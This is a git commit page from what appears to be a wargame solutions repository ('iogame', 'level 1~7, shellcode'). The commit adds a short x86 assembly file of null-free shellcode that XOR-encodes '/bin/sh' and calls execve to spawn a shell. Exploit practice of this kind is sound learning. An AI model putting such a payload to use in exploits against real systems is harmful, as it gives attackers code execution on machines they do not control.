summaryrefslogtreecommitdiff
path: root/shellcode/exec-reloc-nozero.S
diff options
context:
space:
mode:
authorIru Cai <mytbk920423@gmail.com>2018-10-05 17:41:48 +0800
committerIru Cai <mytbk920423@gmail.com>2018-10-05 17:41:48 +0800
commit62d1287693cbb282570c52f44bfcc0be0e590d7f (patch)
tree92261652f6ae3a139a8c36bdf0caf3182ed79c51 /shellcode/exec-reloc-nozero.S
downloadiogame-62d1287693cbb282570c52f44bfcc0be0e590d7f.tar.xz
level 1~7, shellcode
Diffstat (limited to 'shellcode/exec-reloc-nozero.S')
-rw-r--r--shellcode/exec-reloc-nozero.S10
1 files changed, 10 insertions, 0 deletions
diff --git a/shellcode/exec-reloc-nozero.S b/shellcode/exec-reloc-nozero.S
new file mode 100644
index 0000000..f5e2765
--- /dev/null
+++ b/shellcode/exec-reloc-nozero.S
@@ -0,0 +1,10 @@
+.global _start
+_start:
+ xorl %eax,%eax
+ addb $11, %al
+ movl $0x3058431f, %ebx
+ xorl $0x30303030, %ebx # "/sh\0"
+ pushl %ebx
+ pushl $0x6e69622f # "/bin"
+ movl %esp, %ebx
+ int $0x80